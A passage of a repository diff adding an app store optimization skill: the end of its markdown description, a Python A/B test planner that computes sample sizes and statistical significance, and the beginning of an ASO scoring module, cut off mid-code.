- ASO benchmarks vary significantly by category (games vs. utilities)
|
||||||
|
- Seasonality affects different categories differently
|
||||||
|
- Geographic markets have different competitive landscapes
|
||||||
|
- Cultural preferences impact what works in different countries
|
||||||
|
|
||||||
|
### Scope Boundaries
|
||||||
|
- Does not include paid user acquisition strategies (Apple Search Ads, Google Ads)
|
||||||
|
- Does not cover app development or UI/UX optimization
|
||||||
|
- Does not include app analytics implementation (use Firebase, Mixpanel, etc.)
|
||||||
|
- Does not handle app submission technical issues (provisioning profiles, certificates)
|
||||||
|
|
||||||
|
### When NOT to Use This Skill
|
||||||
|
- For web apps (different SEO strategies apply)
|
||||||
|
- For enterprise apps not in public stores
|
||||||
|
- For apps in beta/TestFlight only
|
||||||
|
- If you need paid advertising strategies (use marketing skills instead)
|
||||||
|
|
||||||
|
## Integration with Other Skills
|
||||||
|
|
||||||
|
This skill works well with:
|
||||||
|
- **Content Strategy Skills**: For creating app descriptions and marketing copy
|
||||||
|
- **Analytics Skills**: For analyzing download and engagement data
|
||||||
|
- **Localization Skills**: For managing multi-language content
|
||||||
|
- **Design Skills**: For creating optimized visual assets
|
||||||
|
- **Marketing Skills**: For coordinating broader launch campaigns
|
||||||
|
|
||||||
|
## Version & Updates
|
||||||
|
|
||||||
|
This skill is based on current Apple App Store and Google Play Store requirements as of November 2025. Store policies and best practices evolve—verify current requirements before major launches.
|
||||||
|
|
||||||
|
**Key Updates to Monitor:**
|
||||||
|
- Apple App Store Connect updates (apple.com/app-store/review/guidelines)
|
||||||
|
- Google Play Console updates (play.google.com/console/about/guides/releasewithconfidence)
|
||||||
|
- iOS/Android version adoption rates (affects device testing)
|
||||||
|
- Store algorithm changes (follow ASO blogs and communities)
|
||||||
662
skills/app-store-optimization/ab_test_planner.py
Normal file
662
skills/app-store-optimization/ab_test_planner.py
Normal file
@@ -0,0 +1,662 @@
|
|||||||
|
"""
|
||||||
|
A/B testing module for App Store Optimization.
|
||||||
|
Plans and tracks A/B tests for metadata and visual assets.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
import math
|
||||||
|
|
||||||
|
|
||||||
|
class ABTestPlanner:
|
||||||
|
"""Plans and tracks A/B tests for ASO elements."""
|
||||||
|
|
||||||
|
# Minimum detectable effect sizes (conservative estimates)
|
||||||
|
MIN_EFFECT_SIZES = {
|
||||||
|
'icon': 0.10, # 10% conversion improvement
|
||||||
|
'screenshot': 0.08, # 8% conversion improvement
|
||||||
|
'title': 0.05, # 5% conversion improvement
|
||||||
|
'description': 0.03 # 3% conversion improvement
|
||||||
|
}
|
||||||
|
|
||||||
|
# Statistical confidence levels
|
||||||
|
CONFIDENCE_LEVELS = {
|
||||||
|
'high': 0.95, # 95% confidence
|
||||||
|
'standard': 0.90, # 90% confidence
|
||||||
|
'exploratory': 0.80 # 80% confidence
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
"""Initialize A/B test planner."""
|
||||||
|
self.active_tests = []
|
||||||
|
|
||||||
|
def design_test(
|
||||||
|
self,
|
||||||
|
test_type: str,
|
||||||
|
variant_a: Dict[str, Any],
|
||||||
|
variant_b: Dict[str, Any],
|
||||||
|
hypothesis: str,
|
||||||
|
success_metric: str = 'conversion_rate'
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Design an A/B test with hypothesis and variables.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
test_type: Type of test ('icon', 'screenshot', 'title', 'description')
|
||||||
|
variant_a: Control variant details
|
||||||
|
variant_b: Test variant details
|
||||||
|
hypothesis: Expected outcome hypothesis
|
||||||
|
success_metric: Metric to optimize
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Test design with configuration
|
||||||
|
"""
|
||||||
|
test_design = {
|
||||||
|
'test_id': self._generate_test_id(test_type),
|
||||||
|
'test_type': test_type,
|
||||||
|
'hypothesis': hypothesis,
|
||||||
|
'variants': {
|
||||||
|
'a': {
|
||||||
|
'name': 'Control',
|
||||||
|
'details': variant_a,
|
||||||
|
'traffic_split': 0.5
|
||||||
|
},
|
||||||
|
'b': {
|
||||||
|
'name': 'Variation',
|
||||||
|
'details': variant_b,
|
||||||
|
'traffic_split': 0.5
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'success_metric': success_metric,
|
||||||
|
'secondary_metrics': self._get_secondary_metrics(test_type),
|
||||||
|
'minimum_effect_size': self.MIN_EFFECT_SIZES.get(test_type, 0.05),
|
||||||
|
'recommended_confidence': 'standard',
|
||||||
|
'best_practices': self._get_test_best_practices(test_type)
|
||||||
|
}
|
||||||
|
|
||||||
|
self.active_tests.append(test_design)
|
||||||
|
return test_design
|
||||||
|
|
||||||
|
def calculate_sample_size(
|
||||||
|
self,
|
||||||
|
baseline_conversion: float,
|
||||||
|
minimum_detectable_effect: float,
|
||||||
|
confidence_level: str = 'standard',
|
||||||
|
power: float = 0.80
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Calculate required sample size for statistical significance.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
baseline_conversion: Current conversion rate (0-1)
|
||||||
|
minimum_detectable_effect: Minimum effect size to detect (0-1)
|
||||||
|
confidence_level: 'high', 'standard', or 'exploratory'
|
||||||
|
power: Statistical power (typically 0.80 or 0.90)
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Sample size calculation with duration estimates
|
||||||
|
"""
|
||||||
|
alpha = 1 - self.CONFIDENCE_LEVELS[confidence_level]
|
||||||
|
beta = 1 - power
|
||||||
|
|
||||||
|
# Expected conversion for variant B
|
||||||
|
expected_conversion_b = baseline_conversion * (1 + minimum_detectable_effect)
|
||||||
|
|
||||||
|
# Z-scores for alpha and beta
|
||||||
|
z_alpha = self._get_z_score(1 - alpha / 2) # Two-tailed test
|
||||||
|
z_beta = self._get_z_score(power)
|
||||||
|
|
||||||
|
# Pooled standard deviation
|
||||||
|
p_pooled = (baseline_conversion + expected_conversion_b) / 2
|
||||||
|
sd_pooled = math.sqrt(2 * p_pooled * (1 - p_pooled))
|
||||||
|
|
||||||
|
# Sample size per variant
|
||||||
|
n_per_variant = math.ceil(
|
||||||
|
((z_alpha + z_beta) ** 2 * sd_pooled ** 2) /
|
||||||
|
((expected_conversion_b - baseline_conversion) ** 2)
|
||||||
|
)
|
||||||
|
|
||||||
|
total_sample_size = n_per_variant * 2
|
||||||
|
|
||||||
|
# Estimate duration based on typical traffic
|
||||||
|
duration_estimates = self._estimate_test_duration(
|
||||||
|
total_sample_size,
|
||||||
|
baseline_conversion
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'sample_size_per_variant': n_per_variant,
|
||||||
|
'total_sample_size': total_sample_size,
|
||||||
|
'baseline_conversion': baseline_conversion,
|
||||||
|
'expected_conversion_improvement': minimum_detectable_effect,
|
||||||
|
'expected_conversion_b': expected_conversion_b,
|
||||||
|
'confidence_level': confidence_level,
|
||||||
|
'statistical_power': power,
|
||||||
|
'duration_estimates': duration_estimates,
|
||||||
|
'recommendations': self._generate_sample_size_recommendations(
|
||||||
|
n_per_variant,
|
||||||
|
duration_estimates
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def calculate_significance(
|
||||||
|
self,
|
||||||
|
variant_a_conversions: int,
|
||||||
|
variant_a_visitors: int,
|
||||||
|
variant_b_conversions: int,
|
||||||
|
variant_b_visitors: int
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Calculate statistical significance of test results.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
variant_a_conversions: Conversions for control
|
||||||
|
variant_a_visitors: Visitors for control
|
||||||
|
variant_b_conversions: Conversions for variation
|
||||||
|
variant_b_visitors: Visitors for variation
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Significance analysis with decision recommendation
|
||||||
|
"""
|
||||||
|
# Calculate conversion rates
|
||||||
|
rate_a = variant_a_conversions / variant_a_visitors if variant_a_visitors > 0 else 0
|
||||||
|
rate_b = variant_b_conversions / variant_b_visitors if variant_b_visitors > 0 else 0
|
||||||
|
|
||||||
|
# Calculate improvement
|
||||||
|
if rate_a > 0:
|
||||||
|
relative_improvement = (rate_b - rate_a) / rate_a
|
||||||
|
else:
|
||||||
|
relative_improvement = 0
|
||||||
|
|
||||||
|
absolute_improvement = rate_b - rate_a
|
||||||
|
|
||||||
|
# Calculate standard error
|
||||||
|
se_a = math.sqrt(rate_a * (1 - rate_a) / variant_a_visitors) if variant_a_visitors > 0 else 0
|
||||||
|
se_b = math.sqrt(rate_b * (1 - rate_b) / variant_b_visitors) if variant_b_visitors > 0 else 0
|
||||||
|
se_diff = math.sqrt(se_a**2 + se_b**2)
|
||||||
|
|
||||||
|
# Calculate z-score
|
||||||
|
z_score = absolute_improvement / se_diff if se_diff > 0 else 0
|
||||||
|
|
||||||
|
# Calculate p-value (two-tailed)
|
||||||
|
p_value = 2 * (1 - self._standard_normal_cdf(abs(z_score)))
|
||||||
|
|
||||||
|
# Determine significance
|
||||||
|
is_significant_95 = p_value < 0.05
|
||||||
|
is_significant_90 = p_value < 0.10
|
||||||
|
|
||||||
|
# Generate decision
|
||||||
|
decision = self._generate_test_decision(
|
||||||
|
relative_improvement,
|
||||||
|
is_significant_95,
|
||||||
|
is_significant_90,
|
||||||
|
variant_a_visitors + variant_b_visitors
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'variant_a': {
|
||||||
|
'conversions': variant_a_conversions,
|
||||||
|
'visitors': variant_a_visitors,
|
||||||
|
'conversion_rate': round(rate_a, 4)
|
||||||
|
},
|
||||||
|
'variant_b': {
|
||||||
|
'conversions': variant_b_conversions,
|
||||||
|
'visitors': variant_b_visitors,
|
||||||
|
'conversion_rate': round(rate_b, 4)
|
||||||
|
},
|
||||||
|
'improvement': {
|
||||||
|
'absolute': round(absolute_improvement, 4),
|
||||||
|
'relative_percentage': round(relative_improvement * 100, 2)
|
||||||
|
},
|
||||||
|
'statistical_analysis': {
|
||||||
|
'z_score': round(z_score, 3),
|
||||||
|
'p_value': round(p_value, 4),
|
||||||
|
'is_significant_95': is_significant_95,
|
||||||
|
'is_significant_90': is_significant_90,
|
||||||
|
'confidence_level': '95%' if is_significant_95 else ('90%' if is_significant_90 else 'Not significant')
|
||||||
|
},
|
||||||
|
'decision': decision
|
||||||
|
}
|
||||||
|
|
||||||
|
def track_test_results(
|
||||||
|
self,
|
||||||
|
test_id: str,
|
||||||
|
results_data: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Track ongoing test results and provide recommendations.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
test_id: Test identifier
|
||||||
|
results_data: Current test results
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Test tracking report with next steps
|
||||||
|
"""
|
||||||
|
# Find test
|
||||||
|
test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
|
||||||
|
if not test:
|
||||||
|
return {'error': f'Test {test_id} not found'}
|
||||||
|
|
||||||
|
# Calculate significance
|
||||||
|
significance = self.calculate_significance(
|
||||||
|
results_data['variant_a_conversions'],
|
||||||
|
results_data['variant_a_visitors'],
|
||||||
|
results_data['variant_b_conversions'],
|
||||||
|
results_data['variant_b_visitors']
|
||||||
|
)
|
||||||
|
|
||||||
|
# Calculate test progress
|
||||||
|
total_visitors = results_data['variant_a_visitors'] + results_data['variant_b_visitors']
|
||||||
|
required_sample = results_data.get('required_sample_size', 10000)
|
||||||
|
progress_percentage = min((total_visitors / required_sample) * 100, 100)
|
||||||
|
|
||||||
|
# Generate recommendations
|
||||||
|
recommendations = self._generate_tracking_recommendations(
|
||||||
|
significance,
|
||||||
|
progress_percentage,
|
||||||
|
test['test_type']
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'test_id': test_id,
|
||||||
|
'test_type': test['test_type'],
|
||||||
|
'progress': {
|
||||||
|
'total_visitors': total_visitors,
|
||||||
|
'required_sample_size': required_sample,
|
||||||
|
'progress_percentage': round(progress_percentage, 1),
|
||||||
|
'is_complete': progress_percentage >= 100
|
||||||
|
},
|
||||||
|
'current_results': significance,
|
||||||
|
'recommendations': recommendations,
|
||||||
|
'next_steps': self._determine_next_steps(
|
||||||
|
significance,
|
||||||
|
progress_percentage
|
||||||
|
)
|
||||||
|
}
|
||||||
|
|
||||||
|
def generate_test_report(
|
||||||
|
self,
|
||||||
|
test_id: str,
|
||||||
|
final_results: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Generate final test report with insights and recommendations.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
test_id: Test identifier
|
||||||
|
final_results: Final test results
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Comprehensive test report
|
||||||
|
"""
|
||||||
|
test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
|
||||||
|
if not test:
|
||||||
|
return {'error': f'Test {test_id} not found'}
|
||||||
|
|
||||||
|
significance = self.calculate_significance(
|
||||||
|
final_results['variant_a_conversions'],
|
||||||
|
final_results['variant_a_visitors'],
|
||||||
|
final_results['variant_b_conversions'],
|
||||||
|
final_results['variant_b_visitors']
|
||||||
|
)
|
||||||
|
|
||||||
|
# Generate insights
|
||||||
|
insights = self._generate_test_insights(
|
||||||
|
test,
|
||||||
|
significance,
|
||||||
|
final_results
|
||||||
|
)
|
||||||
|
|
||||||
|
# Implementation plan
|
||||||
|
implementation_plan = self._create_implementation_plan(
|
||||||
|
test,
|
||||||
|
significance
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'test_summary': {
|
||||||
|
'test_id': test_id,
|
||||||
|
'test_type': test['test_type'],
|
||||||
|
'hypothesis': test['hypothesis'],
|
||||||
|
'duration_days': final_results.get('duration_days', 'N/A')
|
||||||
|
},
|
||||||
|
'results': significance,
|
||||||
|
'insights': insights,
|
||||||
|
'implementation_plan': implementation_plan,
|
||||||
|
'learnings': self._extract_learnings(test, significance)
|
||||||
|
}
|
||||||
|
|
||||||
|
def _generate_test_id(self, test_type: str) -> str:
|
||||||
|
"""Generate unique test ID."""
|
||||||
|
import time
|
||||||
|
timestamp = int(time.time())
|
||||||
|
return f"{test_type}_{timestamp}"
|
||||||
|
|
||||||
|
def _get_secondary_metrics(self, test_type: str) -> List[str]:
|
||||||
|
"""Get secondary metrics to track for test type."""
|
||||||
|
metrics_map = {
|
||||||
|
'icon': ['tap_through_rate', 'impression_count', 'brand_recall'],
|
||||||
|
'screenshot': ['tap_through_rate', 'time_on_page', 'scroll_depth'],
|
||||||
|
'title': ['impression_count', 'tap_through_rate', 'search_visibility'],
|
||||||
|
'description': ['time_on_page', 'scroll_depth', 'tap_through_rate']
|
||||||
|
}
|
||||||
|
return metrics_map.get(test_type, ['tap_through_rate'])
|
||||||
|
|
||||||
|
def _get_test_best_practices(self, test_type: str) -> List[str]:
|
||||||
|
"""Get best practices for specific test type."""
|
||||||
|
practices_map = {
|
||||||
|
'icon': [
|
||||||
|
'Test only one element at a time (color vs. style vs. symbolism)',
|
||||||
|
'Ensure icon is recognizable at small sizes (60x60px)',
|
||||||
|
'Consider cultural context for global audience',
|
||||||
|
'Test against top competitor icons'
|
||||||
|
],
|
||||||
|
'screenshot': [
|
||||||
|
'Test order of screenshots (users see first 2-3)',
|
||||||
|
'Use captions to tell story',
|
||||||
|
'Show key features and benefits',
|
||||||
|
'Test with and without device frames'
|
||||||
|
],
|
||||||
|
'title': [
|
||||||
|
'Test keyword variations, not major rebrand',
|
||||||
|
'Keep brand name consistent',
|
||||||
|
'Ensure title fits within character limits',
|
||||||
|
'Test on both search and browse contexts'
|
||||||
|
],
|
||||||
|
'description': [
|
||||||
|
'Test structure (bullet points vs. paragraphs)',
|
||||||
|
'Test call-to-action placement',
|
||||||
|
'Test feature vs. benefit focus',
|
||||||
|
'Maintain keyword density'
|
||||||
|
]
|
||||||
|
}
|
||||||
|
return practices_map.get(test_type, ['Test one variable at a time'])
|
||||||
|
|
||||||
|
def _estimate_test_duration(
|
||||||
|
self,
|
||||||
|
required_sample_size: int,
|
||||||
|
baseline_conversion: float
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""Estimate test duration based on typical traffic levels."""
|
||||||
|
# Assume different daily traffic scenarios
|
||||||
|
traffic_scenarios = {
|
||||||
|
'low': 100, # 100 page views/day
|
||||||
|
'medium': 1000, # 1000 page views/day
|
||||||
|
'high': 10000 # 10000 page views/day
|
||||||
|
}
|
||||||
|
|
||||||
|
estimates = {}
|
||||||
|
for scenario, daily_views in traffic_scenarios.items():
|
||||||
|
days = math.ceil(required_sample_size / daily_views)
|
||||||
|
estimates[scenario] = {
|
||||||
|
'daily_page_views': daily_views,
|
||||||
|
'estimated_days': days,
|
||||||
|
'estimated_weeks': round(days / 7, 1)
|
||||||
|
}
|
||||||
|
|
||||||
|
return estimates
|
||||||
|
|
||||||
|
def _generate_sample_size_recommendations(
|
||||||
|
self,
|
||||||
|
sample_size: int,
|
||||||
|
duration_estimates: Dict[str, Any]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate recommendations based on sample size."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
if sample_size > 50000:
|
||||||
|
recommendations.append(
|
||||||
|
"Large sample size required - consider testing smaller effect size or increasing traffic"
|
||||||
|
)
|
||||||
|
|
||||||
|
if duration_estimates['medium']['estimated_days'] > 30:
|
||||||
|
recommendations.append(
|
||||||
|
"Long test duration - consider higher minimum detectable effect or focus on high-impact changes"
|
||||||
|
)
|
||||||
|
|
||||||
|
if duration_estimates['low']['estimated_days'] > 60:
|
||||||
|
recommendations.append(
|
||||||
|
"Insufficient traffic for reliable testing - consider user acquisition or broader targeting"
|
||||||
|
)
|
||||||
|
|
||||||
|
if not recommendations:
|
||||||
|
recommendations.append("Sample size and duration are reasonable for this test")
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _get_z_score(self, percentile: float) -> float:
|
||||||
|
"""Get z-score for given percentile (approximation)."""
|
||||||
|
# Common z-scores
|
||||||
|
z_scores = {
|
||||||
|
0.80: 0.84,
|
||||||
|
0.85: 1.04,
|
||||||
|
0.90: 1.28,
|
||||||
|
0.95: 1.645,
|
||||||
|
0.975: 1.96,
|
||||||
|
0.99: 2.33
|
||||||
|
}
|
||||||
|
return z_scores.get(percentile, 1.96)
|
||||||
|
|
||||||
|
def _standard_normal_cdf(self, z: float) -> float:
|
||||||
|
"""Approximate standard normal cumulative distribution function."""
|
||||||
|
# Using error function approximation
|
||||||
|
t = 1.0 / (1.0 + 0.2316419 * abs(z))
|
||||||
|
d = 0.3989423 * math.exp(-z * z / 2.0)
|
||||||
|
p = d * t * (0.3193815 + t * (-0.3565638 + t * (1.781478 + t * (-1.821256 + t * 1.330274))))
|
||||||
|
|
||||||
|
if z > 0:
|
||||||
|
return 1.0 - p
|
||||||
|
else:
|
||||||
|
return p
|
||||||
|
|
||||||
|
def _generate_test_decision(
|
||||||
|
self,
|
||||||
|
improvement: float,
|
||||||
|
is_significant_95: bool,
|
||||||
|
is_significant_90: bool,
|
||||||
|
total_visitors: int
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""Generate test decision and recommendation."""
|
||||||
|
if total_visitors < 1000:
|
||||||
|
return {
|
||||||
|
'decision': 'continue',
|
||||||
|
'rationale': 'Insufficient data - continue test to reach minimum sample size',
|
||||||
|
'action': 'Keep test running'
|
||||||
|
}
|
||||||
|
|
||||||
|
if is_significant_95:
|
||||||
|
if improvement > 0:
|
||||||
|
return {
|
||||||
|
'decision': 'implement_b',
|
||||||
|
'rationale': f'Variant B shows {improvement*100:.1f}% improvement with 95% confidence',
|
||||||
|
'action': 'Implement Variant B'
|
||||||
|
}
|
||||||
|
else:
|
||||||
|
return {
|
||||||
|
'decision': 'keep_a',
|
||||||
|
'rationale': 'Variant A performs better with 95% confidence',
|
||||||
|
'action': 'Keep current version (A)'
|
||||||
|
}
|
||||||
|
|
||||||
|
elif is_significant_90:
|
||||||
|
if improvement > 0:
|
||||||
|
return {
|
||||||
|
'decision': 'implement_b_cautiously',
|
||||||
|
'rationale': f'Variant B shows {improvement*100:.1f}% improvement with 90% confidence',
|
||||||
|
'action': 'Consider implementing B, monitor closely'
|
||||||
|
}
|
||||||
|
else:
|
||||||
|
return {
|
||||||
|
'decision': 'keep_a',
|
||||||
|
'rationale': 'Variant A performs better with 90% confidence',
|
||||||
|
'action': 'Keep current version (A)'
|
||||||
|
}
|
||||||
|
|
||||||
|
else:
|
||||||
|
return {
|
||||||
|
'decision': 'inconclusive',
|
||||||
|
'rationale': 'No statistically significant difference detected',
|
||||||
|
'action': 'Either keep A or test different hypothesis'
|
||||||
|
}
|
||||||
|
|
||||||
|
def _generate_tracking_recommendations(
|
||||||
|
self,
|
||||||
|
significance: Dict[str, Any],
|
||||||
|
progress: float,
|
||||||
|
test_type: str
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate recommendations for ongoing test."""
|
||||||
|
recommendations = []
|
||||||
|
|
||||||
|
if progress < 50:
|
||||||
|
recommendations.append(
|
||||||
|
f"Test is {progress:.0f}% complete - continue collecting data"
|
||||||
|
)
|
||||||
|
|
||||||
|
if progress >= 100:
|
||||||
|
if significance['statistical_analysis']['is_significant_95']:
|
||||||
|
recommendations.append(
|
||||||
|
"Sufficient data collected with significant results - ready to conclude test"
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
recommendations.append(
|
||||||
|
"Sample size reached but no significant difference - consider extending test or concluding"
|
||||||
|
)
|
||||||
|
|
||||||
|
return recommendations
|
||||||
|
|
||||||
|
def _determine_next_steps(
|
||||||
|
self,
|
||||||
|
significance: Dict[str, Any],
|
||||||
|
progress: float
|
||||||
|
) -> str:
|
||||||
|
"""Determine next steps for test."""
|
||||||
|
if progress < 100:
|
||||||
|
return f"Continue test until reaching 100% sample size (currently {progress:.0f}%)"
|
||||||
|
|
||||||
|
decision = significance.get('decision', {}).get('decision', 'inconclusive')
|
||||||
|
|
||||||
|
if decision == 'implement_b':
|
||||||
|
return "Implement Variant B and monitor metrics for 2 weeks"
|
||||||
|
elif decision == 'keep_a':
|
||||||
|
return "Keep Variant A and design new test with different hypothesis"
|
||||||
|
else:
|
||||||
|
return "Test inconclusive - either keep A or design new test"
|
||||||
|
|
||||||
|
def _generate_test_insights(
|
||||||
|
self,
|
||||||
|
test: Dict[str, Any],
|
||||||
|
significance: Dict[str, Any],
|
||||||
|
results: Dict[str, Any]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Generate insights from test results."""
|
||||||
|
insights = []
|
||||||
|
|
||||||
|
improvement = significance['improvement']['relative_percentage']
|
||||||
|
|
||||||
|
if significance['statistical_analysis']['is_significant_95']:
|
||||||
|
insights.append(
|
||||||
|
f"Strong evidence: Variant B {'improved' if improvement > 0 else 'decreased'} "
|
||||||
|
f"conversion by {abs(improvement):.1f}% with 95% confidence"
|
||||||
|
)
|
||||||
|
|
||||||
|
insights.append(
|
||||||
|
f"Tested {test['test_type']} changes: {test['hypothesis']}"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Add context-specific insights
|
||||||
|
if test['test_type'] == 'icon' and improvement > 5:
|
||||||
|
insights.append(
|
||||||
|
"Icon change had substantial impact - visual first impression is critical"
|
||||||
|
)
|
||||||
|
|
||||||
|
return insights
|
||||||
|
|
||||||
|
def _create_implementation_plan(
|
||||||
|
self,
|
||||||
|
test: Dict[str, Any],
|
||||||
|
significance: Dict[str, Any]
|
||||||
|
) -> List[Dict[str, str]]:
|
||||||
|
"""Create implementation plan for winning variant."""
|
||||||
|
plan = []
|
||||||
|
|
||||||
|
if significance.get('decision', {}).get('decision') == 'implement_b':
|
||||||
|
plan.append({
|
||||||
|
'step': '1. Update store listing',
|
||||||
|
'details': f"Replace {test['test_type']} with Variant B across all platforms"
|
||||||
|
})
|
||||||
|
plan.append({
|
||||||
|
'step': '2. Monitor metrics',
|
||||||
|
'details': 'Track conversion rate for 2 weeks to confirm sustained improvement'
|
||||||
|
})
|
||||||
|
plan.append({
|
||||||
|
'step': '3. Document learnings',
|
||||||
|
'details': 'Record insights for future optimization'
|
||||||
|
})
|
||||||
|
|
||||||
|
return plan
|
||||||
|
|
||||||
|
def _extract_learnings(
|
||||||
|
self,
|
||||||
|
test: Dict[str, Any],
|
||||||
|
significance: Dict[str, Any]
|
||||||
|
) -> List[str]:
|
||||||
|
"""Extract key learnings from test."""
|
||||||
|
learnings = []
|
||||||
|
|
||||||
|
improvement = significance['improvement']['relative_percentage']
|
||||||
|
|
||||||
|
learnings.append(
|
||||||
|
f"Testing {test['test_type']} can yield {abs(improvement):.1f}% conversion change"
|
||||||
|
)
|
||||||
|
|
||||||
|
if test['test_type'] == 'title':
|
||||||
|
learnings.append(
|
||||||
|
"Title changes affect search visibility and user perception"
|
||||||
|
)
|
||||||
|
elif test['test_type'] == 'screenshot':
|
||||||
|
learnings.append(
|
||||||
|
"First 2-3 screenshots are critical for conversion"
|
||||||
|
)
|
||||||
|
|
||||||
|
return learnings
|
||||||
|
|
||||||
|
|
||||||
|
def plan_ab_test(
|
||||||
|
test_type: str,
|
||||||
|
variant_a: Dict[str, Any],
|
||||||
|
variant_b: Dict[str, Any],
|
||||||
|
hypothesis: str,
|
||||||
|
baseline_conversion: float
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Convenience function to plan an A/B test.
|
||||||
|
|
||||||
|
Args:
|
||||||
|
test_type: Type of test
|
||||||
|
variant_a: Control variant
|
||||||
|
variant_b: Test variant
|
||||||
|
hypothesis: Test hypothesis
|
||||||
|
baseline_conversion: Current conversion rate
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Complete test plan
|
||||||
|
"""
|
||||||
|
planner = ABTestPlanner()
|
||||||
|
|
||||||
|
test_design = planner.design_test(
|
||||||
|
test_type,
|
||||||
|
variant_a,
|
||||||
|
variant_b,
|
||||||
|
hypothesis
|
||||||
|
)
|
||||||
|
|
||||||
|
sample_size = planner.calculate_sample_size(
|
||||||
|
baseline_conversion,
|
||||||
|
planner.MIN_EFFECT_SIZES.get(test_type, 0.05)
|
||||||
|
)
|
||||||
|
|
||||||
|
return {
|
||||||
|
'test_design': test_design,
|
||||||
|
'sample_size_requirements': sample_size
|
||||||
|
}
|
||||||
482
skills/app-store-optimization/aso_scorer.py
Normal file
482
skills/app-store-optimization/aso_scorer.py
Normal file
@@ -0,0 +1,482 @@
|
|||||||
|
"""
|
||||||
|
ASO scoring module for App Store Optimization.
|
||||||
|
Calculates comprehensive ASO health score across multiple dimensions.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional
|
||||||
|
|
||||||
|
|
||||||
|
class ASOScorer:
|
||||||
|
"""Calculates overall ASO health score and provides recommendations."""
|
||||||
|
|
||||||
|
# Score weights for different components (total = 100)
|
||||||
|
WEIGHTS = {
|
||||||
|
'metadata_quality': 25,
|
||||||
|
'ratings_reviews': 25,
|
||||||
|
'keyword_performance': 25,
|
||||||
|
'conversion_metrics': 25
|
||||||
|
}
|
||||||
|
|
||||||
|
# Benchmarks for scoring
|
||||||
|
BENCHMARKS = {
|
||||||
|
'title_keyword_usage': {'min': 1, 'target': 2},
|
||||||
|
'description_length': {'min': 500, 'target': 2000},
|
||||||
|
'keyword_density': {'min': 2, 'optimal': 5, 'max': 8},
|
||||||
|
'average_rating': {'min': 3.5, 'target': 4.5},
|
||||||
|
'ratings_count': {'min': 100, 'target': 5000},
|
||||||
|
'keywords_top_10': {'min': 2, 'target': 10},
|
||||||
|
'keywords_top_50': {'min': 5, 'target': 20},
|
||||||
|
'conversion_rate': {'min': 0.02, 'target': 0.10}
|
||||||
|
}
|
||||||
|
|
||||||
|
def __init__(self):
|
||||||
|
"""Initialize ASO scorer."""
|
||||||
|
self.score_breakdown = {}
|
||||||
|
|
||||||
|
def calculate_overall_score(
|
||||||
|
self,
|
||||||
|
metadata: Dict[str, Any],
|
||||||
|
ratings: Dict[str, Any],
|
||||||
|
keyword_performance: Dict[str, Any],
|
||||||
|
conversion: Dict[str, Any]
|
||||||
|
) -> Dict[str, Any]:
|
||||||
|
"""
|
||||||
|
Calculate comprehensive ASO score (0-100).
|
||||||
|
|
||||||
|
Args:
|
||||||
|
metadata: Title, description quality metrics
|
||||||
|
ratings: Rating average and count
|
||||||
|
keyword_performance: Keyword ranking data
|
||||||
|
conversion: Impression-to-install metrics
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
Overall score with detailed breakdown
|
||||||
|
"""
|
||||||
|
# Calculate component scores
|
||||||
|
metadata_score = self.score_metadata_quality(metadata)
|
||||||
|
ratings_score = self.score_ratings_reviews(ratings)
|
||||||
|
keyword_score = self.score_keyword_performance(keyword_performance)
|
||||||
|
conversion_score = self.score_conversion_metrics(conversion)
|
||||||
|
|
||||||
|
# Calculate weighted overall score
|
||||||
|
overall_score = (
|
||||||
|
metadata_score * (self.WEIGHTS['metadata_quality'] / 100) +
|
||||||
|
ratings_score * (self.WEIGHTS['ratings_reviews'] / 100) +
|
||||||
|
keyword_score * (self.WEIGHTS['keyword_performance'] / 100) +
|
||||||
|
conversion_score * (self.WEIGHTS['conversion_metrics'] / 100)
|
||||||
|
)
|
||||||
|
|
||||||
|
# Store breakdown
|
||||||
|
self.score_breakdown = {
|
||||||
|
'metadata_quality': {
|
||||||
|
'score': metadata_score,
|
||||||
|
'weight': self.WEIGHTS['metadata_quality'],
|
||||||
|
'weighted_contribution': round(metadata_score * (self.WEIGHTS['metadata_quality'] / 100), 1)
|
||||||
|
},
|
||||||
|
'ratings_reviews': {
|
||||||
|
'score': ratings_score,
|
||||||
|
